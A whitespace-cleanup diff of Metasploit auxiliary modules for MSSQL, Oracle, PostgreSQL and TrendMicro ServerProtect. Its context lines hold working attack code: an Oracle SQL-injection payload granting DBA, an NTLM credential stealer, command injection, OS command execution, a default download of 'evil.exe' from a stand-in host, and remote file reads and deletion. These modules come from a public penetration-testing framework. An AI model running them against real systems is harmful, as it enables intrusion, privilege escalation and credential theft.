|
||||
print "[*]\t#{row}"
|
||||
end
|
||||
vernum = sqlversion.gsub("\n"," ").scan(/SQL Server\s*(200\d)/m)
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -72,14 +75,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#checking for C2 Audit Mode
|
||||
if sysconfig['c2 audit mode'] == 1
|
||||
print_status("\tC2 Audit Mode is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "C2 Audit Mode is Enabled")
|
||||
else
|
||||
print_status("\tC2 Audit Mode is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -125,14 +128,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#check if remote access is enabled
|
||||
if sysconfig['remote access'] == 1
|
||||
print_status("\tremote access is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "remote access is Enabled")
|
||||
else
|
||||
print_status("\tremote access is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -142,14 +145,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
#check if updates are allowed
|
||||
if sysconfig['allow updates'] == 1
|
||||
print_status("\tallow updates is Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
:data => "allow updates is Enabled")
|
||||
else
|
||||
print_status("\tallow updates is Not Enabled")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -267,7 +270,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if syslogins != nil
|
||||
syslogins.each do |acc|
|
||||
print_status("\t#{acc.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -438,7 +441,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if sameasuser != nil
|
||||
sameasuser.each do |up|
|
||||
print_status("\t#{up.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -464,7 +467,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if blankpass != nil
|
||||
blankpass.each do |up|
|
||||
print_status("\t#{up.join}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -686,7 +689,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
fountsp.each do |strp|
|
||||
if dangeroussp.include?(strp.strip)
|
||||
print_status("\t#{strp.strip}")
|
||||
report_note(:host => datastore['RHOST'],
|
||||
report_note(:host => datastore['RHOST'],
|
||||
:proto => 'TCP',
|
||||
:port => datastore['RPORT'],
|
||||
:type => 'MSSQL_ENUM',
|
||||
@ -714,7 +717,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
mssql_query(querykey)[:rows].each do |i|
|
||||
instances << i[1]
|
||||
end
|
||||
end
|
||||
end
|
||||
print_status("Instances found on this server:")
|
||||
instancenames = []
|
||||
if instances != nil
|
||||
|
@ -15,7 +15,7 @@ require 'msf/core'
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::MSSQL
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft SQL Server Generic Query',
|
||||
@ -33,12 +33,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SQL', [ false, 'The SQL query to execute', 'select @@version']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
mssql_query(datastore['SQL'], true) if mssql_login_datastore
|
||||
disconnect
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -14,7 +14,7 @@ require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
|
@ -36,13 +36,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Jan 13 2009'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']),
|
||||
OptString.new('USER', [ false, 'The current user. ', 'SCOTT']),
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']),
|
||||
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
|
||||
|
||||
|
||||
], self.class)
|
||||
end
|
||||
|
||||
@ -58,8 +58,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
function1 = %Q|
|
||||
CREATE OR REPLACE PROCEDURE #{name1}
|
||||
AUTHID CURRENT_USER AS
|
||||
PRAGMA AUTONOMOUS_TRANSACTION;
|
||||
BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}';
|
||||
PRAGMA AUTONOMOUS_TRANSACTION;
|
||||
BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}';
|
||||
END;
|
||||
|
|
||||
|
||||
@ -78,17 +78,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
|
||||
|
||||
prepare ="create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)"
|
||||
|
||||
|
||||
exploiting1 ="drop table \"O' and 1=#{datastore['USER']}.#{name2}--\""
|
||||
|
||||
|
||||
exploiting2 = "insert into system.DEF$_TEMP$LOB (TEMP$BLOB) VALUES ('AA')"
|
||||
|
||||
|
||||
fun1 = Rex::Text.encode_base64(function1)
|
||||
fun2 = Rex::Text.encode_base64(function2)
|
||||
prp = Rex::Text.encode_base64(prepare)
|
||||
exp1 = Rex::Text.encode_base64(exploiting1)
|
||||
exp2 = Rex::Text.encode_base64(exploiting2)
|
||||
|
||||
|
||||
|
||||
sql = %Q|
|
||||
DECLARE
|
||||
@ -117,10 +117,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
|
||||
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sql)
|
||||
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -20,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
To do this you must firstly run smb_sniffer or smb_relay module on your sever.
|
||||
Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb
|
||||
which will connect to your SMB sever with credentials of Oracle RDBMS.
|
||||
So if smb_relay is working, you will get Administrator access to server which
|
||||
So if smb_relay is working, you will get Administrator access to server which
|
||||
runs Oracle. If not than you can decrypt HALFLM hash.
|
||||
},
|
||||
'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
|
||||
@ -32,9 +36,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Apr 7 2009'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]),
|
||||
OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -18,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Name' => 'Oracle Account Discovery.',
|
||||
'Description' => %q{
|
||||
This module uses a list of well known default authentication credentials
|
||||
to discover easily guessed accounts.
|
||||
to discover easily guessed accounts.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -10,7 +14,7 @@ require 'msf/core'
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::ORACLE
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle SQL Generic Query',
|
||||
@ -28,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Dec 7 2007'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SQL', [ false, 'The SQL to execute.', 'select * from v$version']),
|
||||
], self.class)
|
||||
@ -49,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
end
|
||||
rescue => e
|
||||
return
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -11,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::ORACLE
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle Database Enumeration',
|
||||
@ -43,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
print_status("Running Oracle Enumeration....")
|
||||
|
||||
|
||||
#Version Check
|
||||
query = 'select * from v$version'
|
||||
ver = prepare_exec(query)
|
||||
@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("\t#{v.chomp}")
|
||||
report_note(:host => datastore['RHOST'], :proto => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{v.chomp}")
|
||||
end
|
||||
|
||||
|
||||
#Saving Major Release Number for other checks
|
||||
majorrel = ver[0].scan(/Edition Release (\d*)./)
|
||||
|
||||
@ -77,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
#-------------------------------------------------------
|
||||
#Security Settings
|
||||
print_status("Security Settings:")
|
||||
@ -129,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_error("It appears you do not have sufficient rights to perform the check")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
query = %Q|
|
||||
SELECT limit
|
||||
@ -146,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_error("It appears you do not have sufficient rights to perform the check")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
query = %Q|
|
||||
SELECT limit
|
||||
@ -163,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_error("It appears you do not have sufficient rights to perform the check")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
begin
|
||||
query = %Q|
|
||||
SELECT limit
|
||||
@ -245,7 +249,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
if majorrel.join.to_i < 11
|
||||
|
||||
query = %Q|
|
||||
SELECT name, password
|
||||
SELECT name, password
|
||||
FROM sys.user$
|
||||
where password != 'null' and type# = 1 and astatus = 0
|
||||
|
|
||||
@ -278,7 +282,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
begin
|
||||
if majorrel.join.to_i < 11
|
||||
query = %Q|
|
||||
SELECT username, password
|
||||
SELECT username, password
|
||||
FROM dba_users
|
||||
WHERE account_status = 'EXPIRED & LOCKED'
|
||||
|
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -15,9 +19,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits an authentication bypass vulnerability
|
||||
in login.php in order to execute arbitrary code via a command injection
|
||||
vulnerability in property_box.php. This module was tested
|
||||
This module exploits an authentication bypass vulnerability
|
||||
in login.php in order to execute arbitrary code via a command injection
|
||||
vulnerability in property_box.php. This module was tested
|
||||
against Oracle Secure Backup version 10.3.0.1.0 (Win32).
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
@ -44,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
cmd = datastore['CMD']
|
||||
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => '/login.php',
|
||||
@ -57,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
sessionid = res.headers['Set-Cookie'].split(';')[0]
|
||||
|
||||
print_status("Sending command: #{datastore['CMD']}...")
|
||||
|
||||
|
||||
send_request_cgi(
|
||||
{
|
||||
'uri' => '/property_box.php',
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -10,7 +14,7 @@ require 'msf/core'
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::ORACLE
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle Java execCommand (Win32)',
|
||||
@ -26,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Dec 7 2007'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
OptString.new('CMD', [ false, 'The OS command to execute.', 'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']),
|
||||
], self.class)
|
||||
@ -52,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
"
|
||||
|
||||
procedure = "
|
||||
create or replace procedure #{name} (p_command in varchar2)
|
||||
create or replace procedure #{name} (p_command in varchar2)
|
||||
as language java
|
||||
name '#{source}.execCommand (java.lang.String)';
|
||||
"
|
||||
@ -61,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
drops = "drop java source #{source}"
|
||||
|
||||
dropp = "drop procedure #{name}"
|
||||
dropp = "drop procedure #{name}"
|
||||
|
||||
begin
|
||||
print_status("Creating java source '#{source}'...")
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -10,7 +14,7 @@ require 'msf/core'
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::ORACLE
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle URL Download',
|
||||
@ -27,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Feb 2003'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URL', [ false, 'The URL to download the binary from.', 'http://www.meh.com/evil.exe']),
|
||||
OptString.new('COPYTO', [ false, 'Location to copy the binary to', 'c:\\meh.exe']),
|
||||
@ -66,11 +70,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)';
|
||||
"
|
||||
|
||||
exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;"
|
||||
|
||||
exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;"
|
||||
|
||||
drops = "drop java source SRC_FILE_UPLOAD"
|
||||
|
||||
dropp = "drop procedure PROC_FILEUPLOAD"
|
||||
dropp = "drop procedure PROC_FILEUPLOAD"
|
||||
|
||||
begin
|
||||
print_status("Creating java source 'SRC_FILE_UPLOAD'...")
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -28,12 +32,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Jan 7 2009'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(1521),
|
||||
OptString.new('SLEEP', [ false, 'Sleep() amount between each request.', '1']),
|
||||
OptString.new('SIDFILE', [ false, 'The file that contains a list of sids.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]),
|
||||
], self.class)
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(1521),
|
||||
OptString.new('SLEEP', [ false, 'Sleep() amount between each request.', '1']),
|
||||
OptString.new('SIDFILE', [ false, 'The file that contains a list of sids.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'sid.txt')]),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
@ -43,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
list = datastore['SIDFILE']
|
||||
|
||||
print_status("Starting brute force on #{rhost}, using sids from #{list}...")
|
||||
|
||||
|
||||
fd = File.open(list).each do |sid|
|
||||
|
||||
|
||||
login = "(DESCRIPTION=(CONNECT_DATA=(SID=#{sid})(CID=(PROGRAM=)(HOST=MSF)(USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=#{rhost})(PORT=#{rport})))"
|
||||
|
||||
pkt = tns_packet(login)
|
||||
|
@ -1,3 +1,7 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
@ -24,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Version' => '$Revision$',
|
||||
'DisclosureDate' => 'Feb 1 2009'))
|
||||
|
||||
register_options(
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(1521),
|
||||
OptString.new('CMD', [ false, 'Something like ping, version, status, etc..', '(CONNECT_DATA=(COMMAND=VERSION))']),
|
||||
@ -42,7 +46,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_status("Sending '#{command}' to #{rhost}:#{rport}")
|
||||
sock.put(pkt)
|
||||
print_status("writing #{pkt.length} bytes.")
|
||||
|
||||
|
||||
sleep(0.5)
|
||||
|
||||
print_status("reading")
|
||||
@ -52,6 +56,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||
res = res.tr("\177",".")
|
||||
puts res
|
||||
|
||||
disconnect
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Pop2
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'UoW pop2d Remote File Retrieval Vulnerability',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the FOLD command of the
|
||||
|
@ -15,7 +15,7 @@ require 'msf/core'
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Postgres
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'PostgreSQL Server Generic Query',
|
||||
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
OptString.new('RFILE', [ true, 'The remote file', '/etc/passwd'])
|
||||
], self.class)
|
||||
|
||||
deregister_options( 'SQL', 'RETURN_ROWSET' )
|
||||
deregister_options( 'SQL', 'RETURN_ROWSET' )
|
||||
end
|
||||
|
||||
def rhost
|
||||
@ -49,7 +49,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def rport
|
||||
datastore['RPORT']
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
ret = postgres_read_textfile(datastore['RFILE'])
|
||||
verbose = datastore['VERBOSE']
|
||||
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
|
||||
end
|
||||
when :complete
|
||||
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
|
||||
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
|
||||
end
|
||||
postgres_logout if self.postgres_conn
|
||||
end
|
||||
|
@ -15,7 +15,7 @@ require 'msf/core'
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Postgres
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'PostgreSQL Server Generic Query',
|
||||
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
'Version' => '$Revision$'
|
||||
))
|
||||
|
||||
register_options( [ ], self.class) # None needed.
|
||||
register_options( [ ], self.class) # None needed.
|
||||
end
|
||||
|
||||
def rhost
|
||||
@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def rport
|
||||
datastore['RPORT']
|
||||
end
|
||||
|
||||
|
||||
def run
|
||||
ret = postgres_query(datastore['SQL'],datastore['RETURN_ROWSET'])
|
||||
verbose = datastore['VERBOSE']
|
||||
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
when :sql_error
|
||||
print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
|
||||
when :complete
|
||||
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
|
||||
print_good "#{rhost}:#{rport} Postgres - Command complete." if verbose
|
||||
end
|
||||
postgres_logout if self.postgres_conn
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Rex::Platforms::Windows
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'TrendMicro ServerProtect File Access',
|
||||
'Description' => %q{
|
||||
This modules exploits a remote file access flaw in the ServerProtect Windows
|
||||
@ -47,25 +47,23 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'list' ]
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(5168),
|
||||
OptString.new('RPATH',
|
||||
[
|
||||
false,
|
||||
"The remote filesystem path",
|
||||
nil
|
||||
]
|
||||
),
|
||||
OptString.new('LPATH',
|
||||
[
|
||||
false,
|
||||
"The local filesystem path",
|
||||
nil
|
||||
]
|
||||
),
|
||||
], self.class)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(5168),
|
||||
OptString.new('RPATH',
|
||||
[
|
||||
false,
|
||||
"The remote filesystem path",
|
||||
nil
|
||||
]),
|
||||
OptString.new('LPATH',
|
||||
[
|
||||
false,
|
||||
"The local filesystem path",
|
||||
nil
|
||||
]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check_option(name)
|
||||
@ -73,9 +71,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
raise RuntimeError, "The #{name} parameter is required by this option"
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def auxiliary_commands
|
||||
{
|
||||
{
|
||||
"delete" => "Delete a file",
|
||||
"download" => "Download a file",
|
||||
"upload" => "Upload a file",
|
||||
@ -92,15 +90,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
when 'upload'
|
||||
check_option('RPATH')
|
||||
check_option('LPATH')
|
||||
cmd_upload(datastore['RPATH'], datastore['LPATH'])
|
||||
cmd_upload(datastore['RPATH'], datastore['LPATH'])
|
||||
when 'delete'
|
||||
check_option('RPATH')
|
||||
cmd_delete(datastore['RPATH'])
|
||||
cmd_delete(datastore['RPATH'])
|
||||
when 'list'
|
||||
check_option('RPATH')
|
||||
cmd_list(datastore['RPATH'])
|
||||
else
|
||||
print_error("Unknown action #{action.name}")
|
||||
print_error("Unknown action #{action.name}")
|
||||
end
|
||||
end
|
||||
|
||||
@ -110,9 +108,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
#
|
||||
# Once this function is used, if cmd_download or cmd_upload is called the server will crash :/
|
||||
#
|
||||
#
|
||||
def cmd_list(*args)
|
||||
|
||||
|
||||
if (args.length < 1)
|
||||
print_status("Usage: list folder")
|
||||
return
|
||||
@ -126,7 +124,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
# FindFirstFile
|
||||
resp = serverprotect_rpccmd(131080, data, 0x100)
|
||||
return if not resp
|
||||
|
||||
|
||||
if resp.length != 0x108
|
||||
print_status("An unknown error occured while calling FindFirstFile.")
|
||||
return
|
||||
@ -143,7 +141,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
file = deunicode(resp[0x30, 0xd0])
|
||||
print("#{file}\n")
|
||||
|
||||
|
||||
data = "\0" * 0x100
|
||||
data[0,4] = [handle].pack('V')
|
||||
|
||||
@ -151,7 +149,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
# FindNextFile
|
||||
resp = serverprotect_rpccmd(131081, data, 0x100)
|
||||
return if not resp
|
||||
|
||||
|
||||
if resp.length != 0x108
|
||||
print_status("An unknown error occured while calling FindFirstFile.")
|
||||
break
|
||||
@ -174,7 +172,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def cmd_delete(*args)
|
||||
|
||||
|
||||
if (args.length == 0)
|
||||
print_status("Usage: delete c:\\windows\\system.ini")
|
||||
return
|
||||
@ -183,7 +181,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
data = Rex::Text.to_unicode(args[0]+"\0")
|
||||
resp = serverprotect_rpccmd(131077, data, 4)
|
||||
return if not resp
|
||||
|
||||
|
||||
if (resp.length == 12)
|
||||
ret, = resp[8,4].unpack('V')
|
||||
|
||||
@ -198,12 +196,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def cmd_download(*args)
|
||||
|
||||
|
||||
if (args.length < 2)
|
||||
print_status("Usage: download remote_file local_file")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
# GENERIC_READ: 0x80000000
|
||||
# FILE_SHARE_READ: 1
|
||||
# OPEN_EXISTING: 3
|
||||
@ -231,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def cmd_upload(*args)
|
||||
|
||||
|
||||
if (args.length < 2)
|
||||
print_status("Usage: upload local_file remote_file")
|
||||
return
|
||||
@ -271,7 +269,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
resp = serverprotect_rpccmd(131073, data, 540)
|
||||
return if not resp
|
||||
|
||||
|
||||
if (resp.length < 548)
|
||||
print_status("An unknown error occurred while calling CreateFile.")
|
||||
return 0
|
||||
@ -363,7 +361,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
padding = ""
|
||||
end
|
||||
|
||||
stub =
|
||||
stub =
|
||||
NDR.long(cmd) +
|
||||
NDR.long(data.length) +
|
||||
data +
|
||||
